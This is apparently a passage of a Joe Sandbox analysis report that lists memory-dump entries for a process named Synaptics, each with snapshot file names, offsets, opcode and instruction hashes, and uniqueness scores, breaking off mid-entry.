                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6050000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: ec2bd21bdc12609b79c08d7dbae52a6431e0f9bcd984036be4e5084cc723ef2d
                                                    • Instruction ID: df842c959593e22bed0817f57499c9a0478901148e9748cf1fe843150c0aea11
                                                    • Opcode Fuzzy Hash: ec2bd21bdc12609b79c08d7dbae52a6431e0f9bcd984036be4e5084cc723ef2d
                                                    • Instruction Fuzzy Hash: 18F0A0B2804354CEEB10CFA9D8083DEFBE4EB68325F1684ABC455A2692D3389149CB25
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: db577eba591d5987bc0bd29e95aed059046ee94e798a429a88886626e7930494
                                                    • Instruction ID: 2bbdfca03c141a268e423e64ca2758d5f8ce241338a3119b6f676bf3cf720eb4
                                                    • Opcode Fuzzy Hash: db577eba591d5987bc0bd29e95aed059046ee94e798a429a88886626e7930494
                                                    • Instruction Fuzzy Hash: D2517C75A002199FDB99CFA9C885AAEBFF5FF48310B049069F905AB251D730DD44DF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: a6136f39b3400fbb7c5bb69cc008c7dcdb6f07e615ab95d428c4e308b070917b
                                                    • Instruction ID: 4ec96f22611398ece0b2e7e68aee6fb63688dbdd123d31bd30c572fde643ce37
                                                    • Opcode Fuzzy Hash: a6136f39b3400fbb7c5bb69cc008c7dcdb6f07e615ab95d428c4e308b070917b
                                                    • Instruction Fuzzy Hash: 63216B76A002199FCB54CFA9C885AAFBBF9EF88314F04802AF914D7215D7309A45DF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b3b9820a4ea2eb2464c6d894c385b3244dc224d9cebf5ec1d8ffa3d0e6302bdc
                                                    • Instruction ID: f9e14728e167cc582c22a803616a5a62f944ce484ea36beb66f3db77a657919d
                                                    • Opcode Fuzzy Hash: b3b9820a4ea2eb2464c6d894c385b3244dc224d9cebf5ec1d8ffa3d0e6302bdc
                                                    • Instruction Fuzzy Hash: 48D16D75A00209DFCB55DFA9C49499EBBF2FF88310B1585A9E8099B361DB30ED41CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a35b9235b0af0a9c7190cdc3c453b74c992277ea8a6db99ad391e4d244a25709
                                                    • Instruction ID: 9a297a19e2028bb81c3a314cd6de29710d21939d0ed2e151c615aff34d6ea057
                                                    • Opcode Fuzzy Hash: a35b9235b0af0a9c7190cdc3c453b74c992277ea8a6db99ad391e4d244a25709
                                                    • Instruction Fuzzy Hash: 66C14B34B002049FDB24DFA4D498AADBBB2FF88314F5494A9E9069B3A5DB31EC45CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25585d76a577088fc0ce98eb3b9ca23fa5b769d7e620286f87f483d1450f39d2
                                                    • Instruction ID: ec7062cb6399aa5f784e4e18dd048704d621c993cbfc9337a97169c93a81243a
                                                    • Opcode Fuzzy Hash: 25585d76a577088fc0ce98eb3b9ca23fa5b769d7e620286f87f483d1450f39d2
                                                    • Instruction Fuzzy Hash: 02B17330644340DFE7B0CF6AD588B55BBE2AF40354F4888A9E4458FAA2D775F9C9CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac9e23d79ae8aca3292e2bb281beb8549d69a833967c0b65335d4827918929d7
                                                    • Instruction ID: 9e774b97978b82f21365ed7ebc1d6f60811207590814da57070593e04436cd74
                                                    • Opcode Fuzzy Hash: ac9e23d79ae8aca3292e2bb281beb8549d69a833967c0b65335d4827918929d7
                                                    • Instruction Fuzzy Hash: 9C919178A02205AFCB25CF64D845EDBBFFAEF89310B24855DF49697251DB309881CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 31a15e4671a69cd6cb18dbc27634735e6b9b625b5acca4ac74ba3db6adebae8b
                                                    • Instruction ID: bcaa2e2532f5778af63c5fa7ca9b18737fb63d215f97ed42f2d00458971a3c7d
                                                    • Opcode Fuzzy Hash: 31a15e4671a69cd6cb18dbc27634735e6b9b625b5acca4ac74ba3db6adebae8b
                                                    • Instruction Fuzzy Hash: 45717E75A40209AFCB45DFA9C844AEEFBF5FF88310F148166E905D7211D730A955CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cac95430fce68d37e0f4230b82ecf6cf85f6f3b917759bec53ddc760b6fa74ed
                                                    • Instruction ID: f6fd79a789218cec8b848a56195e7aadfcb4579bda9e828b4c3f63a8d68c7551
                                                    • Opcode Fuzzy Hash: cac95430fce68d37e0f4230b82ecf6cf85f6f3b917759bec53ddc760b6fa74ed
                                                    • Instruction Fuzzy Hash: 8881603460030ACFCB64DF68C5489AEBBFAFF84204B149D69D816C72A4EB70F945CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c67ac0db8561687084efc8ca23c9603b7a69eb1c40bee8d8207f31519da17b2
                                                    • Instruction ID: 284c6e954e76f9ee08b6d799de92d467423c43f89a7f89af2d2c902e2cabf604
                                                    • Opcode Fuzzy Hash: 9c67ac0db8561687084efc8ca23c9603b7a69eb1c40bee8d8207f31519da17b2
                                                    • Instruction Fuzzy Hash: 5E615E30B402058FCB54DF69D598AADBBF6EF88314F1584A9E406EB3A0DB35EC45CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d920b4088c8167041a4064d5cafad75f4334fa069939e8a65a3528a79c31cc97
                                                    • Instruction ID: b273932b3d349c1ad85e7a9c09b6033cf6a800db5659755182b286c2ad024559
                                                    • Opcode Fuzzy Hash: d920b4088c8167041a4064d5cafad75f4334fa069939e8a65a3528a79c31cc97
                                                    • Instruction Fuzzy Hash: E8615C74E012099FDB54DFA5D984AAEBBF6FF89310F14842AE506A73A4DB30AC41CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 767bbf98c7853b40ed6bd5e01ac31663105ab050bf8824609157f6175cd123f2
                                                    • Instruction ID: a49532b96a56555b7ec41a63390993315d17a1a81a199ff16f36958414364c8c
                                                    • Opcode Fuzzy Hash: 767bbf98c7853b40ed6bd5e01ac31663105ab050bf8824609157f6175cd123f2
                                                    • Instruction Fuzzy Hash: 2861BFB5A002198FDB54CFA9C484A9EBBF6BF88310F14846AE919EB354E730EC41CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3b40f88cbd2c071f6d6622c13da0e544a285ec79649a5ed7bcc79eda83c6381
                                                    • Instruction ID: 7defc377f86906b7ffbee32bf27131e21b747dde73dc012b8224dbf753b819f4
                                                    • Opcode Fuzzy Hash: e3b40f88cbd2c071f6d6622c13da0e544a285ec79649a5ed7bcc79eda83c6381
                                                    • Instruction Fuzzy Hash: EA51B376B042099FCB41CFA5D8448AFBFFAEF88210B14846AF955D3212DB31D855CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e9afd16ce40649a5c933b76e7ac7061a77239b770de96dff5b138a3cbe5ba5c
                                                    • Instruction ID: bc7b5ffc9053f3dede07558c70815b3a47d2aef6e621e04700e215639204095d
                                                    • Opcode Fuzzy Hash: 6e9afd16ce40649a5c933b76e7ac7061a77239b770de96dff5b138a3cbe5ba5c
                                                    • Instruction Fuzzy Hash: E551737160030ACFCB64DF68C548AAABBFAFF44214F148D69D856C72A1D770F945CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c663f0b9c9fe6552663c477961c27b97580a7a68a91dc93d5afe6800c69e0bec
                                                    • Instruction ID: cffeaa9aac42fa6aeefe9a0a68bbd577c748dc2ba9279965d8a0e143e581cc6c
                                                    • Opcode Fuzzy Hash: c663f0b9c9fe6552663c477961c27b97580a7a68a91dc93d5afe6800c69e0bec
                                                    • Instruction Fuzzy Hash: C551C2B5A002598FDB54CFA9C894A9EBBF6FF48210F14446AE819EB354E730ED41CF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d0927978854e264ae62a82f610832378c43a47da865958a117844f7cb04e815
                                                    • Instruction ID: 7b6b8c37d273b52cdced6ced8c87dac8e9a7d4ca500710794532339f3c3259b8
                                                    • Opcode Fuzzy Hash: 8d0927978854e264ae62a82f610832378c43a47da865958a117844f7cb04e815
                                                    • Instruction Fuzzy Hash: 5F518C35B042459FCBA1CF69C884AAABFF2FF45320F558595F455DB2A1D730E940CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c5fd306b9e671bb7994f610d02af5537540237deecc57d4ccdbc1552307dcd0
                                                    • Instruction ID: 11021525028d631bbd9eee982c4857af472dadba8bbbff59b34bd08dd1ecfae3
                                                    • Opcode Fuzzy Hash: 3c5fd306b9e671bb7994f610d02af5537540237deecc57d4ccdbc1552307dcd0
                                                    • Instruction Fuzzy Hash: D0510674E006199FDB65CF9AC884A9DFBF2BF48300F1485A9E54AAB761D770E981CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d053eede3bc5e55c548776564248b53c067b326fc0d68b19146bcdcd318a7421
                                                    • Instruction ID: 72121e18bb88b2e990588ee91be5196588b90b6ceeb81186a3ff9e385f9f7d6a
                                                    • Opcode Fuzzy Hash: d053eede3bc5e55c548776564248b53c067b326fc0d68b19146bcdcd318a7421
                                                    • Instruction Fuzzy Hash: FA519D75A003069FCB54DF68C58899ABBF2FF89318B1489A9D4499B336DB30FD45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67c1837c652159c15dece33d770c9a400034135812bcff8b0a61f8671fd258d4
                                                    • Instruction ID: acde13048171e239b894b84d2cff57c17a9ae0fab2ecc91986019236cb7c680f
                                                    • Opcode Fuzzy Hash: 67c1837c652159c15dece33d770c9a400034135812bcff8b0a61f8671fd258d4
                                                    • Instruction Fuzzy Hash: 80519C75A003069FCB54DF68C58889ABBF2FF89318B1089A9D4499B336DB30FD45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6017a1c1341f695f416f8fb797c1ee5c5f3c658b8bc052981823994a803bded
                                                    • Instruction ID: bf48294e47f439fd358d0ef2bad9255201f5072fab4264b0458166c0744554f9
                                                    • Opcode Fuzzy Hash: a6017a1c1341f695f416f8fb797c1ee5c5f3c658b8bc052981823994a803bded
                                                    • Instruction Fuzzy Hash: 404106393446048FC754CF2AC58892ABBE6FF89225B1549A9E54A8B772CB30EC81CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ebbb6d37721ccd107a5fb9a81acb6dfb4fa5014bc67ab8232313c09dfbad72cc
                                                    • Instruction ID: 34e231e37a0e6d08ffeb437a009ba37e8499eb9cffba8f7e57be4041ad4c1069
                                                    • Opcode Fuzzy Hash: ebbb6d37721ccd107a5fb9a81acb6dfb4fa5014bc67ab8232313c09dfbad72cc
                                                    • Instruction Fuzzy Hash: 69411734B506058FDB48DF69C489B6EBBF5EF48714F1480A9E905CB362CB76E844CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9a307b4ff33dafce1c874c8cdf596449b07c87fe2fb370ff154060c059ea7278
                                                    • Instruction ID: 3e4aa126766c29aeef49158b55dfb3f2fd7b508af021837e3e506c198acdf9d0
                                                    • Opcode Fuzzy Hash: 9a307b4ff33dafce1c874c8cdf596449b07c87fe2fb370ff154060c059ea7278
                                                    • Instruction Fuzzy Hash: 6431E735B1020A9BCB94DFAAC8546AFBBF6EF84204F144839E505DB265EB31FD01CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a344bfdcfc5cef8d1f61f3265e4785aa3a2d67cec78659fc1ccd9bc6b62a66d2
                                                    • Instruction ID: 2af7042c65571d320c3d223e373a42358d92dd5053be84c2e5fb69d9470ce5b4
                                                    • Opcode Fuzzy Hash: a344bfdcfc5cef8d1f61f3265e4785aa3a2d67cec78659fc1ccd9bc6b62a66d2
                                                    • Instruction Fuzzy Hash: 9F41F474B106158FDB48DF69C489A6ABFF9FF48704B1580A9E506CB362CB76EC44CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 532f29494140147de2025ae84ab9ceda8caf2015d3def33e2997d4a07f697362
                                                    • Instruction ID: 36982e7032065a3feb15442a49c1f1dc57fd16107a4c3daab30e74d4cbf949fe
                                                    • Opcode Fuzzy Hash: 532f29494140147de2025ae84ab9ceda8caf2015d3def33e2997d4a07f697362
                                                    • Instruction Fuzzy Hash: AF316975B102068FCB98EFB6E8455AEBBF7EF88204B504428E906D7360EF349C01CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 978c4f41318bd97f6b07111c5b6b129610df82025c5e5d3e9961ed607239792b
                                                    • Instruction ID: 88ce9a76086b663a59fec49992bbbe81ff72087d2619a61a42e212931a360077
                                                    • Opcode Fuzzy Hash: 978c4f41318bd97f6b07111c5b6b129610df82025c5e5d3e9961ed607239792b
                                                    • Instruction Fuzzy Hash: 7531AC7AA40219CFCB64DF65D5889AABBF1FF88310B148569E9099B721D730FD02CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9742fa57e16c9850b990be311d3bb598786577102f8d1e1d310d82144878dc87
                                                    • Instruction ID: 083a2458a195e2905fa862905a571a8813f97a70e291f37c06e640b8b9b19efa
                                                    • Opcode Fuzzy Hash: 9742fa57e16c9850b990be311d3bb598786577102f8d1e1d310d82144878dc87
                                                    • Instruction Fuzzy Hash: 062189357601108FC784DF3AD4A892A7BEAAF88A10B1540A9F90ACB371DF31DC41CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a809b51842cd564b51103d63e6175d554211428eba9f5d9962eafb16d4eccf19
                                                    • Instruction ID: a72cb1d243446bfcbadb1099c8b8ebf78258aaa52027811bdb2b946a8b5f6b14
                                                    • Opcode Fuzzy Hash: a809b51842cd564b51103d63e6175d554211428eba9f5d9962eafb16d4eccf19
                                                    • Instruction Fuzzy Hash: 57217C347802169FDB549F69D9486BE7BE6FF98340F104468FA03D7380DA399D008BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 925e18d15e4d83cf8371443ea3e5d164f2caad5f84d1fdc781a4053342e1f5cd
                                                    • Instruction ID: c3a8680beca1841c72a3a5173440e544aa4ed0c5b3db66bf03f84777a2419e49
                                                    • Opcode Fuzzy Hash: 925e18d15e4d83cf8371443ea3e5d164f2caad5f84d1fdc781a4053342e1f5cd
                                                    • Instruction Fuzzy Hash: 53218075B502069FCB98DF66E9855AEBFF7FF88200B104569E80AD7361DB349C05CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa6f5320b5c6ff4cc25a033b8eb0cdc6868d12adc69910dcad05d64bcd668567
                                                    • Instruction ID: dd315914db08871a5bf633caea159c6a854ca8755cf1f1edeeedc586712ca186
                                                    • Opcode Fuzzy Hash: aa6f5320b5c6ff4cc25a033b8eb0cdc6868d12adc69910dcad05d64bcd668567
                                                    • Instruction Fuzzy Hash: 7A218E3574021A9FCB549F69D944ABE7FF6FF99240F108469FA03D7380DA359910CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.391318580.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_158d000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4cd372e10973d38ca5aaaa56a4c252fdeb807e00491d79cb67242dd6c05fdb79
                                                    • Instruction ID: bee549b01cac728a60945a5199fe4ddd3fb0dd8bae2c0d6769c52e2af52a44a1
                                                    • Opcode Fuzzy Hash: 4cd372e10973d38ca5aaaa56a4c252fdeb807e00491d79cb67242dd6c05fdb79
                                                    • Instruction Fuzzy Hash: 60213371504204DFDB10EF94D9C4B2ABBF5FB84354F20C969D8095F286D33AD807CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424747177.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_5b00000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 713f9a783833ae49c31a3257501d93b7ec307ac6031bfc19855d2fd2f830b511
                                                    • Instruction ID: b22f3216307e5c38b10103a3dded5aa53c91e2d3fae0104aae47b73f935c2039
                                                    • Opcode Fuzzy Hash: 713f9a783833ae49c31a3257501d93b7ec307ac6031bfc19855d2fd2f830b511
                                                    • Instruction Fuzzy Hash: 661104737082194FE714DA69F8406AAFBE9FBC4230F188577E505C7180DA31E811CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ebe5aebaa7065937860aff31f6d632175a7a6382b78e69d46d4af6e2fe14d5bc
                                                    • Instruction ID: b7a21bc4bd80226489560a2297f219c81359f4a6f8117c9168923d537235d712
                                                    • Opcode Fuzzy Hash: ebe5aebaa7065937860aff31f6d632175a7a6382b78e69d46d4af6e2fe14d5bc
                                                    • Instruction Fuzzy Hash: D9216979A0021ADFCB14CF65D58496ABFF2FF88310B1085A8E908AB321D730ED41CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e032d221268afbdeb1d26284722bcfdb67c89cf2be3ff999d98cef894450cb8c
                                                    • Instruction ID: b7e5a056a14bc92fe42e65bac422460e33da06998f6ce1090939d8dae8e1f99a
                                                    • Opcode Fuzzy Hash: e032d221268afbdeb1d26284722bcfdb67c89cf2be3ff999d98cef894450cb8c
                                                    • Instruction Fuzzy Hash: DF11C22210E3E05FCB63977D58B49E73FE98E0316830948EBE0C6CB4B2E614C959C361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.424906711.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_6060000_Synaptics.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b01b94f2105d0b0dd117bf2ac8a8c3f95fcab881d67120125b13ff0f12b1fdf1
                                                    • Instruction ID: b4d4a928596643fb701b979bef80609868c11f865fab8dd5dea5446a4e3b44c8
                                                    • Opcode Fuzzy Hash: b01b94f2105d0b0dd117bf2ac8a8c3f95fcab881d67120125b13ff0f12b1fdf1
